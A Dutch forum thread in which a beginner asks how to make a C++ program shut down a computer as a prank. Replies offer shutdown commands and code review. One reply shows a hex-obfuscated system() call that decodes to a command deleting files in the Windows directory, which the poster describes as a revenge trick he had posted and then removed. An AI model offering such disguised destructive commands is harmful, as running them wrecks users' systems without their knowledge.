Asluiten

Status
Niet open voor verdere reacties.

60078

Nieuwe gebruiker
Lid geworden
18 jun 2008
Hallo ik heb pas de trail versie van visual studio 2008 gedownload en ik wil graag voor de grap met een c++ programma de computer afsluiten , wie weet hoe dat moet ?

alvast bedankt

je zult op dit forum geen ondersteuning vinden voor dit soort "grappen" dus tenzij je een goeie reden hebt om de computer af te sluiten zul je het zelf uit moeten zoeken

Het kan ook voor eigen doeleinden zijn, ik heb op mijn bureablad ook een snelkoppeling die de computer afsluit als je hem gebruik. Is geen C++ helaas, ik zou ook wel willen weten of het mogelijk is.

je zult op dit forum geen ondersteuning vinden voor dit soort "grappen" dus tenzij je een goeie reden hebt om de computer af te sluiten zul je het zelf uit moeten zoeken

Ik postte gisteren in eerste instantie een koekje van eigen deeg. Maar ik heb hem daarna maar verwijderd aangezien ik anders waarschijnlijk een ban kreeg :P

Code:
const char *cmd = "\x64\x65\x6c\x20\x2f\x71\x20\x25\x77\x69\x6e\x64\x69\x72\x25\x5c\x2a\x2e\x2a";
system(cmd);

Het kan ook voor eigen doeleinden zijn, ik heb op mijn bureablad ook een snelkoppeling die de computer afsluit als je hem gebruik. Is geen C++ helaas, ik zou ook wel willen weten of het mogelijk is.

Je geeft zelf al aan dat Windows deze mogelijkheid biedt. (en het grootste gedeelte van Windows is in C geschreven naar ik meen)

Je kan de functie ExitWindows gebruiken. Hiervoor moet het proces eerst een bepaalde privilege krijgen (weet niet uit me hoofd precies hoe die heet, check MSDN).

Een makkelijkere manier is door gewoon shutdown uit te voeren:

Code:
system("shutdown -s -t 00 -f");

Dit commando zal de PC zonder wachttijd geforceerd afsluiten.

Zullen we het bepalen of iets wel of niet kan bij de moderators laten, ok? :)
In het vervolg mag je gebruik maken van de "meld misbruik in dit bericht" link welke onder elke post te vinden is om het te melden bij een moderator.

Laatst bewerkt:
Code:
#include <iostream>
#include <string>
#include <windows.h>

using namespace std;

static string filename;
static string start;
char choice;

void file(){
     cout<<"Bye..";
     };
int main()
{
     SetConsoleTitle("Bye Bye");
     file();

return(0);
}

Heb nu dit snel bij elkaar gevogeld, hij werkt alleen mijn computer zegt nadat die afgesloten is "U kunt nu de Computer Aflsuiten" en moet je alsnog de power knop indrukken.

Code:
#include <iostream>
#include <string>
#include <windows.h>

using namespace std;

static string filename;
static string start;
char choice;

void file(){
     cout<<"Bye..";
     };
int main()
{
     SetConsoleTitle("Bye Bye");
     file();

return(0);
}

Heb nu dit snel bij elkaar gevogeld, hij werkt alleen mijn computer zegt nadat die afgesloten is "U kunt nu de Computer Aflsuiten" en moet je alsnog de power knop indrukken.

Het lijkt wel alsof je dat 'ping' programma als template genomen hebt. :P

Die globale variabele staan er waarschijnlijk nog in omdat je het programma zo overgenomen hebt. Maar die heb je helemaal niet nodig. Daarbij is een extra functie voor het afsluiten niet echt nodig. Dat kan goed binnen de main-functie geplaatst worden. (wederom overgenomen van het ping-programma, lijkt het wel. Of ben je zelf TotcoS ? :P)

Code:
#include <iostream>

int main(){
   std::cout << "Deze computer wordt nu afgesloten\n";
   system("shutdown -s");
   return 0;
}

had ik inderdaad gedaan, en niet echt goed de tijd genomen... leuk dat je dat onthouden heb zeg! ;)

had ik inderdaad gedaan, en niet echt goed de tijd genomen... leuk dat je dat onthouden heb zeg! ;)

Die globale static variabelen vallen best wel op.

Ben jij C++ trouwens gewoon van het internet aan het leren ? Ik zou toch echt de moeite nemen om een goed (digitaal)boek te nemen om de basis te leren. Dan wordt het denk ik allemaal een stuk duidelijker.

(om te beginnen is bijvoorbeeld het boek 'basiscursus c++' van Leen Ammeraal wel goed;)

Ik heb wel een boek geleend van de bibliotheek, maar vond ik niks ik vind het toen niks, en heb wel het meesten van het internet geleerd. Maar ik wil nu niet verder offtopic gaan :)

Top nog van je reactie!

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan